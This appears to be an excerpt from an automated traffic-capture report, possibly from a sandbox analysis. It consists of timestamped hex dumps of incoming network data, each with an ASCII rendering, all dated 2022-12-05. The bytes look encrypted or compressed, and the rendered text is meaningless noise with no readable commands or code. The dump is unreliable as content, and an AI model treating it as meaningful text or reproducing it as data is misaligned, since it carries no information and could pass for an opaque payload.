                                                                                                                                                                          2022-12-05 14:13:35 UTC130INData Raw: 41 de 15 65 7d 76 97 d3 6d c3 dc 05 fb 29 9c d8 a8 a4 e0 e8 86 81 58 96 25 1e 9c 94 74 e9 58 9e b0 08 e1 6e 38 c8 b5 c7 b6 04 7f 2d aa e5 19 bd 35 30 36 56 27 44 87 2c b0 a7 6c 8d df e7 63 9b 16 7b 24 a9 b1 c2 29 f0 ce e3 f2 27 a3 0a b8 8c 12 0b f1 1e fa 92 0c ce a3 98 82 42 ba 1b ee 54 55 88 87 1b aa f2 e2 2c d2 9a 4c fd
                                                                                                                                                                          Data Ascii: Ae}vm)X%tXn8-506V'D,lc{$)'BTU,L
                                                                                                                                                                          2022-12-05 14:13:35 UTC130INData Raw: 51 a4 c3 f5 db 3a 8e 34 72 0f 70 e6 82 73 1a 84 99 c8 fd 3a a1 6e 7f 1f 33 a1 e5 72 c0 4b c8 f6 3e e7 c9 63 cb 0f 70 c8 e3 c7 3e cd 89 1b fc ed 75 9a 34 b2 86 50 07 ee df b8 38 9d ec 7b bb ec 90 b1 6f 5a a5 ce 95 3d f8 08 ee 3c 31 6e 06 cb 1a 5a e5 62 f8 7d 32 f1 2a a6 7f 6e 7d dc 88 5d 4a d5 4c 4a f2 2c 33 5b 08 56 91 e9 3d a1 3f df 12 c9 76 c2 50 2f c2 77 e6 e1 d9 34 9e 8a e5 ac 61 09 ea 00 40 96 3d 6f cc 3e b6 ed 75 15 7b f2 b7 71 aa da 27 ad ca d3 92 93 05 94 de a5 74 d7 27 d9 cb a5 91 f0 e1 f1 51 91 35 6c ce 16 ef 1e ec d0 0f 22 52 bf 65 6a f6 8f 6a 85 b4 cb 7a db af a6 44 25 4b 51 2e ed 6e 6d 48 00 f3 c2 43 3a 75 87 de 1e b9 f8 ee f2 5a f6 64 7b e8 52 9d 2d e2 02 51 1f 8f 79 ac 60 c3 a2 db 86 38 52 61 68 42 b3 da b4 02 85 5b 0b 4c 4d 40 ec b7 b2 2b
                                                                                                                                                                          Data Ascii: Q:4rps:n3rK>cp>u4P8{oZ=<1nZb}2*n}]JLJ,3[V=?vP/w4a@=o>u{q't'Q5l"RejjzD%KQ.nmHC:uZd{R-Qy`8RahB[LM@+
                                                                                                                                                                          2022-12-05 14:13:35 UTC131INData Raw: 1e 77 e7 35 78 b7 77 27 9e 9a a2 c4 5e 43 1c 94 d2 22 db 95 5b fa 46 96 22 60 3d 0c 18 8f 81 cc 96 d6 a9 4f 7c 86 ce 0f 06 ab d2 ae b1 a3 6d 26 d2 f7 f1 f4 3d 87 ca 6f 8e 02 90 cf 62 bd f4 96 b1 cc f1 ca b3 97 02 cc fd 19 ca d5 7b cb 0e 17 a7 9b 74 a2 65 50 56 05 47 6d ac e5 5b a7 58 a6 5e 6c 8b 6d 21 4f 91 0e ec 2c ec 87 2f 6a 90 01 54 c9 7f 83 b4 17 ad 3c 20 81 06 f3 99 4f 3d d5 4b 85 ad c1 5d 63 c9 0a a2 da 51 31 da 02 dd 63 63 b5 03 89 d1 3a fc fd b2 66 c2 76 06 2a 40 98 0a c5 af de 00 c2 89 f1 aa 66 ae 39 58 ec 0f 73 44 91 5b 58 0e 0b f2 92 33 4b bd 07 da 73 19 fa cf ea 2f 4d 29 b2 5c 81 85 63 e0 ae 2a fc 59 27 72 f7 f8 fc df 02 30 8e d1 a6 b4 3b d0 c0 8a 65 ab fa a6 bd e0 c5 77 1e 6c 19 10 6c fe 3e e7 34 7b 8d 6b c1 bc 7a 28 fb 3e d9 2e 65 be e3 8f
                                                                                                                                                                          Data Ascii: w5xw'^C"[F"`=O|m&=ob{tePVGm[X^lm!O,/jT< O=K]cQ1cc:fv*@f9XsD[X3Ks/M)\c*Y'r0;ewll>4{kz(>.e
                                                                                                                                                                          2022-12-05 14:13:35 UTC132INData Raw: 22 76 27 61 1c 00 d8 20 9a 1b 9d 63 73 b4 e1 05 29 30 55 5f b5 3c 19 3e d8 4b 6e 3b b3 12 4f c5 7e dc c0 d3 9d 44 d3 03 4f fd 81 d9 76 5c 9d bb ad 97 a7 9d 3f 1f da 46 61 63 9a a0 5e ba 2d ed 04 fa 6c c8 57 b9 fa 92 66 24 dc 84 b9 eb 8e 1f dd 80 4f a1 54 66 4f d4 79 75 a3 a9 72 05 5c 09 56 b8 aa 70 f8 2b 68 52 01 37 38 c6 91 4c 4e c2 c1 85 83 f7 6f f9 fd dc 0b b3 1d bc 1c 46 5d 15 ae 14 52 bb 20 98 af 17 26 a3 44 2e 7b 2f e1 71 07 bc f3 99 fd 38 f1 98 9b 26 72 1d 09 d6 7c af 6f e5 7e b3 a7 20 bc e2 90 8a ea 2e 05 3a b5 0a e9 d1 42 92 18 65 9c b7 c4 92 e2 09 3a ab 82 01 a1 7c fb c2 fd 19 24 60 44 51 df ec 00 ed 45 66 2b ac 9b 3c 65 9c 73 13 44 51 41 d5 b1 e0 e8 39 30 76 f9 cd ba 67 a4 59 36 d9 a2 da 2c 56 09 b8 61 ef f1 0a 51 35 85 2c b2 f0 3a e0 32 2c df
                                                                                                                                                                          Data Ascii: "v'a cs)0U_<>Kn;O~DOv\?Fac^-lWf$OTfOyur\Vp+hR78LNoF]R &D.{/q8&r|o~ .:Be:|$`DQEf+<esDQA90vgY6,VaQ5,:2,
                                                                                                                                                                          2022-12-05 14:13:35 UTC133INData Raw: 03 79 9d 0a 35 77 9b 98 34 4f f7 2d 96 3f 05 bf 5e ef 99 16 a1 ea 25 65 db b7 06 47 8a e6 11 4b 42 5d e8 7d e6 3d 62 3e 11 6c 36 1e ec 1c 9e 28 66 43 00 8a 60 2f cf d5 a8 3d c9 8b 20 b5 aa 44 50 15 01 ee bb 39 ce e3 c8 a9 02 37 58 17 24 06 74 d5 39 59 07 ab 12 56 86 8f 80 2f 2c 17 05 b7 84 f9 1f 08 1c 3b 7b ab 78 70 66 43 29 4c 00 5b c8 aa da 2e 96 7c bc 8d 25 78 0d 3f 16 60 a9 46 ff fa e4 ac 9e 2b 8c f8 bd e4 4c 19 f1 ff d7 ea 49 bc c6 4a 7e 37 e5 b3 9b 00 b9 7c eb 34 7d 90 56 02 44 f6 6d 56 91 3d 18 24 b7 35 44 6c 6b 5f b7 0b c2 c8 8b ec 5e 6a c7 fe 98 ce f5 a9 3b 2f f9 6f d4 79 de 4d 7c 6f af 53 a6 78 f9 28 ce bf eb 74 77 8a 6e c6 d2 56 87 04 65 2d 5b a4 69 92 d5 e5 48 f9 30 2f 8a 18 07 c9 6a b7 92 75 18 3c 5a ad 07 99 f3 91 e7 d6 6b 87 33 43 44 4c d2
                                                                                                                                                                          Data Ascii: y5w4O-?^%eGKB]}=b>l6(fC`/= DP97X$t9YV/,;{xpfC)L[.|%x?`F+LIJ~7|4}VDmV=$5Dlk_^j;/oyM|oSx(twnVe-[iH0/ju<Zk3CDL
                                                                                                                                                                          2022-12-05 14:13:35 UTC135INData Raw: 36 68 d4 8d 32 f0 76 14 0b 17 e5 bb 85 50 31 4a 4a c3 dd 2b 8d 0f bf 41 61 64 b6 94 dc 69 e5 85 42 d4 61 e8 5a 06 41 6c db 91 1c 86 30 d4 3e 7f 20 3e 5a 24 b9 cc 39 c1 ec a9 55 eb 55 a6 c0 10 4f 48 f5 f8 1a d1 22 ea 0b f9 3f 89 18 a8 38 e4 55 a7 39 29 4a 82 13 62 e8 ca ca d7 38 d0 3c 57 25 74 74 d0 cf 52 38 04 ce 21 96 86 a0 7e e2 58 40 ae 13 b9 31 16 c8 d3 4e ea b4 67 f9 14 b5 b9 7e 27 a3 0a 34 3f 3b 03 e9 fc 9d 78 77 9e 11 4b b0 44 bb 85 5c 6f 6a d3 88 1d c5 9d 51 a4 25 00 7e e1 f9 08 04 63 35 e6 79 d5 1a da 08 b2 d6 e9 06 f6 92 e7 30 c8 4d 65 3b b0 a5 aa fd 5d 77 9b ae fd 13 cc 09 f6 cb b8 d6 f4 d0 a8 ae 1f 8c 49 f7 ce 5c 4d c5 eb 1a 64 3b e2 92 49 9d 06 40 e7 b5 da 85 e4 ae 29 34 0c 41 1c f5 5d 35 55 31 f6 3b 8a e7 df c9 9a df 74 98 b9 4b 86 b9 60 0c
                                                                                                                                                                          Data Ascii: 6h2vP1JJ+AadiBaZAl0> >Z$9UUOH"?8U9)Jb8<W%ttR8!~X@1Ng~'4?;xwKD\ojQ%~c5y0Me;]wI\Md;I@)4A]5U1;tK`
                                                                                                                                                                          2022-12-05 14:13:35 UTC136INData Raw: 29 f0 f4 37 87 cf f9 3d a6 45 2e 1d f1 f6 f5 10 6f 4b ae dd 95 cf f2 0a 3c ee 86 b7 c7 d7 0d 88 37 5a 33 63 da 47 6b e8 58 b9 3b e3 46 56 95 d1 91 3c cf 94 49 d6 9d 75 fb ad cb 97 b2 08 14 0f e8 d4 4f ec e4 6d b6 ac 96 e6 d6 67 ed f5 91 ab aa 72 95 ba 0b ef a5 8e 6e 7d 9f 10 c9 d7 f6 26 d8 69 2a ae f4 3a 53 ef 36 4f 71 99 60 33 3e 32 31 2e ce a0 07 c5 79 92 3a ca 6b 7e f4 48 a8 ce 3f dd 3a e7 20 90 14 2b fa 60 2a ec e6 c6 e4 cc 84 5d c5 54 01 b3 71 e9 91 f2 54 7c 2c 2f cc da 13 0a c6 ee 24 8f 9d 8a bb 39 9f 2f 50 8e 72 43 13 82 d5 79 1e ed cb dd bb ea 47 5c 89 85 64 95 4f d8 1e 4f ae a7 52 c2 30 37 04 96 79 29 e3 da fc 9b 3c 88 e0 0f 21 05 0b 77 a6 d3 36 7a e5 11 0f 34 10 e8 1b 3a 18 5e a1 ae a3 21 03 19 cb c2 11 4a 30 68 9f c5 85 01 ad 6d 7c 02 b9 c9 ef
                                                                                                                                                                          Data Ascii: )7=E.oK<7Z3cGkX;FV<IuOmgrn}&i*:S6Oq`3>21.y:k~H?: +`*]TqT|,/$9/PrCyG\dOOR07y)<!w6z4:^!J0hm|
                                                                                                                                                                          2022-12-05 14:13:35 UTC137INData Raw: 07 54 49 1b e3 b9 6b 8a 2d 6a ab 9e 84 31 d8 c1 64 83 6a 32 f7 0a f3 b0 b6 d2 c4 45 5b 31 19 04 fc 99 62 95 b8 70 2d e7 15 08 90 ef 87 b6 33 7d 5d 50 35 d0 3c 09 c4 e1 0e 03 5a 61 9e c0 41 b2 da 8a f9 43 74 3d 91 d6 37 3a 12 bd d8 13 17 08 1e df a2 95 c2 dc c9 3f bb e4 aa 9f ce 08 2e 1d 19 86 51 36 83 28 a1 dd f1 1e dc ad 59 36 d7 46 fa c5 a3 01 71 0f fc 0f 7c 63 cb 63 38 3e 40 70 b4 08 15 55 71 86 1a 39 5f c6 cc 91 2a a7 0b 74 81 66 d6 90 55 65 0a 38 d0 6a 0a 7c b7 88 13 a7 72 dd 1e 5f 4f c4 05 e9 94 2b 2b 31 7a ff 6e 28 92 41 87 e2 b7 38 b1 2c f4 da 6c be 67 4c 4a ab c2 cc 1b fe 1f 81 0e 8c 49 52 f2 69 e9 a4 93 4b 32 06 8b b3 5a 93 b7 f1 ea ee 02 1e 63 ce b0 74 ef 8d 1f 47 75 b1 25 13 80 e7 e3 33 9e a5 d5 de e0 c0 75 00 65 d9 e3 f1 ae a8 aa 7f 25 31 28
                                                                                                                                                                          Data Ascii: TIk-j1dj2E[1bp-3}]P5<ZaACt=7:?.Q6(Y6Fq|cc8>@pUq9_*tfUe8j|r_O++1zn(A8,lgLJIRiK2ZctGu%3ue%1(
                                                                                                                                                                          2022-12-05 14:13:35 UTC138INData Raw: 44 6c 22 19 86 30 85 45 69 70 75 10 e9 1f 0e 0e 28 b5 99 6d c5 bc ca 87 05 07 74 a8 a0 7f 7a aa 13 cd 96 59 8d 24 b2 1d 5e 7c 7a f3 23 d2 44 45 60 ae c4 82 bf ce 42 28 8f 0f 09 81 93 be 9a f9 c2 5b db 61 85 b7 be 0f ef 88 ad 4f 11 e3 04 44 3b a5 32 34 17 c5 56 b0 bd fd bb 80 fe 78 b4 1f 78 8d 76 3d 6d 69 fd 06 0f 46 fa bb c8 1b 8b 29 af 0c 2c 13 42 57 3d e5 c8 3c fc 0a b2 56 db 84 a3 69 c3 da e4 cc 70 c1 35 79 79 05 90 21 90 54 93 1a c7 8e 71 d3 20 58 2d dc 07 25 39 29 00 d8 e3 e3 56 05 22 14 b4 16 bd 1e 0e 36 96 df f6 3e ad c3 0e 0a 05 82 4a 43 1c 17 7e 24 bc 5f 00 11 c9 06 05 a8 84 41 e3 ba 71 21 12 ea 7b 28 3f 46 56 d6 da 89 c4 f0 1b 0f f6 26 20 43 e2 08 2a 3d 50 19 7f 8f c8 7a 14 3b e5 7b b6 a6 55 a0 7f 4e e2 d9 b7 9b 8e e4 a0 30 71 0b 26 58 5d bc 14
                                                                                                                                                                          Data Ascii: Dl"0Eipu(mtzY$^|z#DE`B([aOD;24Vxxv=miF),BW=<Vip5yy!Tq X-%9)V"6>JC~$_Aq!{(?FV& C*=Pz;{UN0q&X]
                                                                                                                                                                          2022-12-05 14:13:35 UTC139INData Raw: 66 a3 32 bb dc bf d6 ce b7 de 41 0d 5c ee e4 9c 9c 92 bd 66 cd c3 28 b0 c8 e8 76 34 c0 e5 61 26 dc 1e 10 e1 33 87 e1 1b d9 08 a2 44 7f e0 7f 77 6a 48 4d eb b4 40 00 37 2f 54 e0 28 49 62 c3 da ec 11 d4 af 86 64 75 b4 5c 57 2c 5f 52 99 1c 39 e6 bb 4c 26 01 22 b7 18 86 e1 cf ec 30 a0 1b dc 3f 13 3b d0 da 92 91 1a 5b 56 8f 7a 70 6a 2d 45 a0 4a d4 4d 37 99 0e 21 a2 b3 fd a5 eb 24 27 77 e9 2a 48 aa 7d ab 6f d5 9a 9e ea 46 fb 29 6c da 9c 45 ca 66 c2 fb 47 79 97 a4 29 cf 86 19 74 0a 37 8b 22 7f b8 14 da 7a 7a 02 4e 0e 9f 7b 90 bc e9 c1 7c 5a db d3 2a 34 72 84 85 70 0c 77 49 85 d5 e8 e5 5f d9 a0 82 7d bd 41 43 16 a0 99 eb 28 a9 19 cb 0a 24 0c 81 3f 97 a9 cc c7 2f 74 f2 9f 57 2b 0c a4 55 da 5f 01 7f 52 6c 7b fb 84 46 a4 a2 74 f3 4c 07 82 dc 17 0f 78 05 b6 f8 d7 37
                                                                                                                                                                          Data Ascii: f2A\f(v4a&3DwjHM@7/T(Ibdu\W,_R9L&"0?;[Vzpj-EJM7!$'w*H}oF)lEfGy)t7"zzN{|Z*4rpwI_}AC($?/tW+U_Rl{FtLx7
                                                                                                                                                                          2022-12-05 14:13:35 UTC141INData Raw: 35 9c 93 68 6b 2c 45 a0 50 3d a3 8b 8c 26 b0 e7 2c 4e 87 c0 7e 60 08 04 f8 2d 64 bb 4a 9c 94 2b 48 aa 64 29 df 32 e3 83 16 87 85 da 04 ae b9 aa 12 28 19 ab 24 43 ff f5 bb 64 46 94 3e b8 22 d3 f8 81 0b 69 f1 a5 36 17 fe fc 79 62 40 2b 7b 52 b0 14 44 d9 bd cc b6 ec d0 86 17 12 62 c7 c4 10 f2 7d 93 ca 6f 5f 73 75 25 93 61 67 3a c5 79 6f 41 37 2b de 39 dd 51 7c 3a 81 2c 79 08 94 46 33 57 96 71 28 4d d0 42 c5 50 37 95 2f 13 23 2e 55 6f 49 81 49 83 df b3 62 04 77 dd 36 65 33 12 9f 63 1a 37 20 d4 60 fc 60 31 59 c1 94 74 c1 37 5e ef 69 83 1f af 6e a3 73 aa fe f1 c0 16 bc ee 7f 77 ad ae c9 2a 34 e5 7d bf de bc 14 17 ab ec 9c 23 00 9c 16 06 a2 9a 70 e0 79 57 0d 56 38 5e f1 d6 b8 41 37 f5 84 73 f7 67 35 0e b3 f8 c7 b3 54 5c d2 c7 b2 82 f5 22 55 69 a4 f5 52 b0 ad 48
                                                                                                                                                                          Data Ascii: 5hk,EP=&,N~`-dJ+Hd)2($CdF>"i6yb@+{RDb}o_su%ag:yoA7+9Q|:,yF3Wq(MBP7/#.UoIIbw6e3c7 ``1Yt7^insw*4}#pyWV8^A7sg5T\"UiRH
                                                                                                                                                                          2022-12-05 14:13:35 UTC142INData Raw: e8 e1 f5 f0 a4 c1 a4 03 76 a2 b5 0e 38 36 ef 22 e0 b8 fa a7 70 07 c1 97 82 b2 23 9a 27 cb 05 19 65 94 b0 b0 87 94 7e 84 1d 12 dc d6 dd 32 7f ad 52 c2 ce 8f d6 b3 a5 75 42 79 0a a8 3e f4 12 06 36 95 a5 62 2e 42 86 57 e7 ae b1 04 df cd 69 bd 43 98 9d bc fc 7b de 56 65 12 aa 6d 17 89 2d cb 9f de b1 b8 e4 46 e2 26 bc 92 55 15 a2 0c 34 00 eb 1c 1e 7c a4 c6 08 3c 5f a3 72 a6 16 e0 3c 0f 4c 75 ce be 43 6e f5 4e a1 be 02 8d 90 64 4c 66 d8 fb 23 9d f7 9e 94 27 03 6b a7 e9 df 33 d8 5d 27 78 c9 86 49 79 78 e1 6e 01 ae 9f b0 59 7d e6 72 5f 7d f0 25 a4 8d 02 bc c9 6d 66 58 1e 8f 5e e1 2b ba f8 5d fa f5 19 93 22 66 9d 05 81 15 b2 cc 81 6d 06 97 ba 19 3e ed ba 73 d9 bf 50 e6 9d 17 e5 84 b3 4c d1 e8 a0 b8 46 ec 61 0b ae f4 a0 f6 38 04 e9 12 be a8 b2 63 c1 6e 43 1b 52 00
                                                                                                                                                                          Data Ascii: v86"p#'e~2RuBy>6b.BWiC{Vem-F&U4|<_r<LuCnNdLf#'k3]'xIyxnY}r_}%mfX^+]"fm>sPLFa8cnCR
                                                                                                                                                                          2022-12-05 14:13:35 UTC143INData Raw: fe 9d 47 31 96 85 96 b2 99 45 79 ab b1 66 df 12 b9 97 43 a0 e7 20 f7 ed 58 6f 3e 51 7e 07 e4 53 78 4b d9 11 4c 15 85 8a a2 a3 58 ef 4b 33 c8 ef ec 4f dc b9 76 df 94 6f dc 02 98 e5 e0 e0 82 f2 f9 8b eb c9 72 dd 33 c1 26 e5 0d 54 79 f2 53 8e 4a 76 87 a5 0d 82 ad 3e 21 89 ec 5c a3 b9 62 b5 98 7d e5 17 5a d8 cf e8 e3 ea 24 88 c6 cb f8 1a 40 dc 92 16 74 59 4d d6 4b fe 9a ab 15 65 de fb 46 fb f6 6a 4e fc 1a 22 bb 74 06 a6 c0 7e 94 3a 34 1e 20 29 31 f1 b6 36 de f8 e1 49 20 2e 7c 71 52 04 ef ce c8 f5 d7 93 8d 59 15 a2 0b 39 01 4f 7b 94 12 31 c1 8c 6d 62 a8 9f 1f f6 a8 9d 7e 3f 74 f2 75 26 f2 de e1 fe 8d 7b 3e 7f ce b5 84 99 a6 b9 0c b1 bc 4d b9 58 7b ed f8 59 9e f7 48 09 76 20 b2 e6 ad 71 01 cf 50 34 55 28 81 93 c6 2b 5a 45 59 56 34 61 46 7c 90 45 da 74 53 a2 bf
                                                                                                                                                                          Data Ascii: G1EyfC Xo>Q~SxKLXK3Ovor3&TySJv>!\b}Z$@tYMKeFjN"t~:4 )16I .|qRY9O{1mb~?tu&{>MX{YHv qP4U(+ZEYV4aF|EtS
                                                                                                                                                                          2022-12-05 14:13:35 UTC144INData Raw: ce f6 5a 56 b4 b3 7b 99 d0 14 33 6c e7 2b a6 19 07 e6 3c 6e 04 f2 0d 10 2b f3 5d 91 8f 31 83 ac 8c 86 fc d4 07 ba b9 df ed 22 60 97 8c 41 9a 20 3b a6 be e4 d7 91 65 cb 9d 5a cf 6f 99 01 5d 15 93 ab f5 39 ff a5 3b 95 b7 6b 2d e2 5a 41 46 ce 88 99 a5 31 cd f9 97 21 6e 2d cd 2b 79 2c e5 6c c3 74 64 bd 56 12 1d b2 e2 b6 97 dc 45 6d 79 73 3b 61 70 95 36 f6 0c 0b a3 27 6a d6 ae af 0e 55 c9 ac 04 1e 0b 7d 50 fa b7 04 bb c6 1c 0e 21 7f f7 0d 59 d3 1f a1 c7 3c f9 53 03 c3 7d 24 44 5b 6c ea 52 55 77 7f 40 d1 f3 3f 6d 36 c6 9d 40 85 28 9d 76 9c 84 be d0 19 17 6e 27 cd 90 f2 59 38 ea 1a 1c f4 dd 48 f1 09 75 84 26 2d f1 1a f5 4f 83 a4 38 6e 05 67 f7 69 64 7c d8 7e 48 26 20 c7 55 0d bc ed 6c f9 3d 29 fe b9 29 72 ea 09 4e 1c e5 65 d2 a6 0e 73 b6 8d cf 05 e6 5d 4f ba d6
                                                                                                                                                                          Data Ascii: ZV{3l+<n+]1"`A ;eZo]9;k-ZAF1!n-+y,ltdVEmys;ap6'jU}P!Y<S}$D[lRUw@?m6@(vn'Y8Hu&-O8ngid|~H& Ul=))rNes]O
                                                                                                                                                                          2022-12-05 14:13:35 UTC146INData Raw: f4 0b d4 69 0c 7f 18 70 8e 1e 50 ba 87 4b 64 3c 44 63 c0 42 df e1 ed 69 e6 2d a1 c2 c9 6c 07 68 4b a0 29 1f ef 56 35 ac 6c b0 ef 43 60 8b 67 6d 75 f1 d0 a4 97 cf 9c a7 e4 88 0b 8f 92 04 1d 9d 32 44 7d 87 0b 71 70 48 26 e8 ab d5 d3 a9 6b 2e 1a 4d ba 42 66 ae 52 99 74 91 66 d4 17 06 c2 e7 22 94 ed b0 2f 71 f2 56 ad 18 f8 5a
                                                                                                                                                                          Data Ascii: ipPKd<DcBi-lhK)V5lC`gmu2D}qpH&k.MBfRtf"/qVZ
                                                                                                                                                                          2022-12-05 14:13:35 UTC146INData Raw: bd 54 29 6d 95 de 8b 84 c1 59 7c 68 69 44 8a 84 f7 54 3e 43 f4 1b db 1b f5 32 3a 7e 04 09 d6 f3 d4 40 b0 88 49 81 e4 7b ca 3d 54 05 e5 8b a2 29 7b 47 bc 52 39 3b 6d 5f 4f 84 94 c3 bd 95 79 f4 97 4f 56 4b 2e 74 59 af d1 6b c9 34 a1 7e 36 0e 6b 38 46 67 83 fb 51 2d 83 cb a8 40 85 0d 29 20 3e 55 ce d2 a1 20 5d d1 55 b8 45 d0 76 4d 2f 72 09 1b 1d dd 58 61 ba 6f 8a cc d9 3c 83 4c d8 90 f4 b8 4c 79 56 75 02 81 69 5c 83 46 bf 9f b8 fd d7 45 3c c1 97 95 7f 50 9c bc fc 3a f9 4b 18 51 40 39 8c 27 32 f0 04 a4 9b fb a2 15 2b dd 89 28 5e 58 77 86 34 b9 e6 42 af 59 de bb a9 32 1c 0c 95 92 22 e5 fa 3b 62 22 40 ea b5 e4 d5 9e a1 db b8 72 0e 78 8b b1 68 fa a0 57 84 5e e0 4f b5 f0 54 d3 b9 10 a8 52 e4 f3 46 38 3d fc 25 84 df c7 43 8f f9 ad 5c 36 03 18 9a cc ed b6 cc ce de
                                                                                                                                                                          Data Ascii: T)mY|hiDT>C2:~@I{=T){GR9;m_OyOVK.tYk4~6k8FgQ-@) >U ]UEvM/rXao<LLyVui\FE<P:KQ@9'2+(^Xw4BY2";b"@rxhW^OTRF8=%C\6
                                                                                                                                                                          2022-12-05 14:13:35 UTC147INData Raw: 8c e5 17 b7 d4 d9 db 9d 06 00 8f c5 e2 a5 c2 79 f0 c7 23 99 aa fe 57 7e e8 b0 71 cd d1 bb bd 48 1e f3 d3 36 6b 3a 82 49 34 fa d2 d4 5e 8f 0f 81 4a 99 b9 6c 5d c4 9c 8d a5 b6 0b 4e ad 21 b9 a6 43 c7 10 b8 71 c0 ee e4 e6 ec 16 27 35 ea 01 ba 3c 99 8f 66 c1 f0 be 2a e8 96 a6 8b c4 86 d2 9c f8 d8 fc e4 45 4c 15 f7 c3 5f 57 48 54 ff 15 24 52 3b 03 34 4b 0b 97 55 3e 40 0d 87 ba 00 c3 95 de d6 55 8d 6c 22 2a 2a ae d7 f2 37 6b 9e 0e 59 78 77 54 3c 52 05 d2 2e 8f ac d0 b7 29 6e f0 63 fe 00 bb d4 39 1f f1 91 e8 00 d9 01 a3 7a 3f 09 ad ee 33 8b c5 94 57 1c 7e 50 11 94 e6 1d 6b 22 bb b0 38 40 84 a8 8a ac 42 93 00 de 6d a7 e1 78 86 fb 80 bd cc 9f 7d bc b3 26 38 61 7b 46 a5 ae d1 1e 46 58 49 70 c1 fa 1f 00 4e 49 5b 92 af 78 17 b1 59 bf 89 d7 06 ba 06 54 09 de 84 77 d5
                                                                                                                                                                          Data Ascii: y#W~qH6k:I4^Jl]N!Cq'5<f*EL_WHT$R;4KU>@Ul"**7kYxwT<R.)nc9z?3W~Pk"8@Bmx}&8a{FFXIpNI[xYTw
                                                                                                                                                                          2022-12-05 14:13:35 UTC148INData Raw: 9d 88 46 47 41 aa ae 6a eb de fb b6 cb 90 32 11 6a 13 3a a8 49 3f c6 79 47 39 7b a4 04 f1 49 47 36 85 f9 68 91 0d 72 af fa e6 62 27 d0 5e f9 95 7c c7 5b 68 a0 e5 a1 a3 bf ec d9 ad 1e 6d bd cd 09 18 b2 3c eb da 46 f7 cc d4 ea e6 50 38 96 2b 69 96 63 88 c8 77 98 0e c8 03 d8 49 27 46 e7 9b 95 69 0a bd e7 db 68 6e 8f b1 9b 28 86 cc c8 96 14 9e 14 a0 72 76 25 45 15 86 de 68 a4 a1 5d 5a 88 43 82 be bb fa e6 81 0a 92 03 66 fd dc 2f ad fa 6a 9a 90 38 42 47 94 11 25 e8 12 d4 86 36 82 1f 73 43 79 2a f8 43 f8 3e 03 1d 02 b3 77 16 6d d5 a6 c6 43 07 5d 41 c7 46 36 9b 36 b1 fb 44 dd 77 ee 41 61 05 b0 00 8c d3 83 18 0c f6 58 4d f6 d1 f3 dd 36 71 3b c7 13 64 77 12 47 aa 52 69 e0 45 07 a0 32 79 0e 03 fd 12 28 52 d4 a0 ed c4 fd 20 8f 5d c4 3b 6b 75 4c ff b4 47 26 67 e4 04
                                                                                                                                                                          Data Ascii: FGAj2j:I?yG9{IG6hrb'^|[hm<FP8+icwI'Fihn(rv%Eh]ZCf/j8BG%6sCy*C>wmC]AF66DwAaXM6q;dwGRiE2y(R ];kuLG&g
                                                                                                                                                                          2022-12-05 14:13:35 UTC149INData Raw: e5 2a a5 d9 c4 e2 a5 ce 46 4b 90 26 72 0a 89 c2 5c e2 17 61 0a 9f aa 64 38 15 62 20 07 1c 63 ca 4f 17 2a f2 91 97 93 ef e2 67 b0 ef cf e3 18 6f 63 84 6b a5 33 65 e1 db c7 41 4a 40 e9 55 50 40 07 de cf 00 62 d9 ad 75 51 17 6c db e3 9e 7b b2 4b 98 e4 d0 3b 64 ca 92 b3 1e 57 76 c8 39 28 18 9a 94 7e 22 09 bc cd 48 34 90 1b d0 c1 5e 59 83 5d be 56 f9 d9 11 f9 4c 69 f8 cf 1f 82 6d d1 11 82 5b ee df 28 f2 f8 3d 76 d6 fd 80 76 2f 32 e1 e2 41 b8 8f 24 a2 d4 11 e7 47 fd 67 59 77 9e c9 10 2e e5 49 11 5a 7f d1 84 38 ce 6f 75 82 ec c2 8e e6 99 8f f5 83 06 9c 6e 90 4d b5 49 b1 f0 2f 14 4b ea de 5f 29 13 d6 2a ab 5e e1 c0 19 2e eb 7f 90 d2 36 9c 64 8a 7e 6c 91 b7 34 93 8f 43 2d 3a 07 46 b1 a7 67 f8 5f 3d 3c c4 e3 03 ec f9 61 43 ab ba e3 7b 61 0c 23 8b 93 86 d8 17 52 4a
                                                                                                                                                                          Data Ascii: *FK&r\ad8b cO*gock3eAJ@UP@buQl{K;dWv9(~"H4^Y]VLim[(=vv/2A$GgYw.IZ8ounMI/K_)*^.6d~l4C-:Fg_=<aC{a#RJ
                                                                                                                                                                          2022-12-05 14:13:35 UTC151INData Raw: 19 dd 76 b8 00 f9 b1 dc a4 53 b4 8a 75 7b 24 9d b6 d9 54 86 96 06 65 c3 d0 7c 3f 8c ab 0b e0 50 13 e3 bb 56 56 e1 20 36 c3 3f bc 38 37 26 05 e0 17 a2 f7 d4 ce 36 1a bc 33 b7 34 eb af 3d e1 94 79 0e 2b e6 3e 26 29 d1 98 15 08 1a c1 9a 9b ff 68 1e 5c 4a 80 a6 c1 dc a4 f5 c4 43 1d 1e 6b cc 27 47 38 a6 4e 54 d2 ec 2e 1b f0 9c 11 71 56 69 9e c5 4d 4a 23 c0 b8 29 d2 16 71 8d 3e e8 84 41 28 1a bb be 6c db e0 26 88 a3 68 6c 06 23 e7 a4 07 ba 58 4a c8 3a 10 d7 6f 72 bb ee be e9 76 3d 99 09 1c 97 a3 ff fd 30 05 9c 03 9b 33 40 3b 77 af 1a 2e db c0 e6 70 bd 29 06 dd 24 bc 8d dd e3 40 62 cd 41 69 7e 57 5b 5c 5a 6e 5d 79 96 e3 0e 30 ca 1f 2a 1e 33 3c 7a 0a 77 86 91 28 56 bb 92 0d af 6a 99 c7 87 cf d6 2c 6c 92 a8 80 6e 2b 6c ef d3 26 9a 41 e7 44 75 73 d9 d5 ca fa 59 e5
                                                                                                                                                                          Data Ascii: vSu{$Te|?PVV 6?87&634=y+>&)h\JCk'G8NT.qViMJ#)q>A(l&hl#XJ:orv=03@;w.p)$@bAi~W[\Zn]y0*3<zw(Vj,ln+l&ADusY
